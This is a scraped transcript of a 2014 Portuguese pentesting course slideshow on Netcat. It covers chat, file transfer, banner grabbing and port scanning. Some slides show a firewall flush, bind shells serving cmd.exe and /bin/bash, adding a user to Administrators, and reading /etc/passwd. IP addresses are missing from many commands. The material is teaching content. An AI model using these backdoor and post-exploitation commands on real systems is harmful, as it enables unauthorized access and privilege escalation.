Presentation is loading. Please wait.

Presentation is loading. Please wait.

Pentest com script shell & Perl Cerutti – IESGF - 2014.

Similar presentations

Presentation on theme: "Pentest com script shell & Perl Cerutti – IESGF - 2014."— Presentation transcript:

1 Pentest com script shell & Perl Cerutti – IESGF - 2014

2 Ping broadcast Veja a mascara da sura rede. O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. Por exemplo: – Meu IP na rede é – A mascara é – O end de broadcast será

3 root# ping PING ( 56 data bytes 64 bytes from icmp_seq=0 ttl=64 time=0.063 ms 64 bytes from icmp_seq=0 ttl=64 time=30.095 ms 64 bytes from icmp_seq=1 ttl=64 time=0.117 ms 64 bytes from icmp_seq=1 ttl=64 time=17.263 ms

4 Netcat According to, Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011

5 d/14051/nc110.tgz d/14051/nc110.tgz sudo apt-get install netcat-traditional

6 Desativar firewall Iptables -F

7 Chat interface

8 Hypervisors

9 Conectar porta conectar porta alta qualquer, por exemplo portaTCP 1234 $ nc -l 1234 nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on: $ nc 1234

10 chat

11 transferindo dados com Netcat –vv (double v) for additional verbosity that will give you the number of bytes transferred during a file transfer. The –w switch instructs Netcat to wait for a specific number of seconds before timing out the connection. In our example, we specify 30 seconds

12 Transferencia no MAC-OSX nc -v -w 30 -p 1234 –l > secret.txt Start by using nc to listen on a specific port, with output captured into a file: $ nc -l 1234 > filename.out Using a second machine, connect to the listening nc process, feeding it the file which is to be trans- ferred: $ nc 1234 < After the file has been transferred, the connection will close automatically.

13 banner grabbing with Netcat

14 Windows remote shell (and simple post-exploitation hi-jinks) Preparing the listener nc –Lp 31337 –vv –e cmd.exe Connecting to the target nc 31337 – Dir c:/ – Md /invasao – net localgroup Administrators bob

15 Linux shell sudo nc –lp 31337 –e /bin/bash Connecting to the target As I have demonstrated in the previous exercise, you simply connect to the host (as shown below) and the port that you want to connect to, and the listener will serve up the bash shell for you as follows: nc 31337 grep bob /etc/passwd

16 Abrindo paginas web no servidor $ echo -n "GET / HTTP/1.0\r\n\r\n" | nc 80

17 Enviando email $ nc localhost 25 << EOF HELO MAIL FROM: RCPT TO: DATA Body of email.. QUIT EOF

18 Varredura de portas $ nc -z 20-30 Connection to 22 port [tcp/ssh] succeeded! Connection to 25 port [tcp/smtp] succeeded! The port range was specified to limit the search to ports 20 - 30.

19 which server software is running, and which versions. o first make a connection, and then break the connection when the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server: $ echo "QUIT" | nc 20-30 SSH-1.99-OpenSSH_3.6.1p2 Protocol mismatch. 220 IMS SMTP Receiver Version 0.84 Ready

20 Open a TCP connection to port 42 of using as the IP for the local end of the connection: $ nc -s 42 Create and listen on a Unix Domain Socket: $ nc -lU /var/tmp/dsocket Connect to port 42 of via an HTTP proxy at, port 8080. This example could also be used by ssh(1); see the ProxyCommand directive in ssh_config(5) for more information. $ nc -x10.2.3.4:8080 -Xconnect 42

21 Scanning a range of devices with a script for i in {10..12}; do nc –vv –n –w 1 192.168.0.$i 21-25 –z; done

22 Official sites Unix Netcat Homepage: GNU Netcat Project: Ncat – The Nmap Project:

23 Articles and tutorials Offensive Security explains how to create a persistent back door using Netcat and Metasploit's Meterpreter: Netcat_Backdoor Crazy Netcat Relays for Fun and Profit: Ass_Netcat_Relays_for_Fun_and_Profit SANS Institute Netcat Pocket Cheatsheet: v1.pdf Some interesting use cases not covered in this book by Johannes Franken: A great reference for using Netcat for debugging SOAP and XML web services using Netcat: web-services/

24 Twitter Follow Thomas Wilhelm on Twitter:!/thomas_wilhelm Follow Brian Baskin on Twitter:!/bbaskin Follow Michael Scherer on Twitter:!/theprez98 Follow Ed Skoudis on Twitter:!/edskoudis For more Open Source information, follow Packt at:!/packtopensource

Download ppt "Pentest com script shell & Perl Cerutti – IESGF - 2014."

Similar presentations

Ads by Google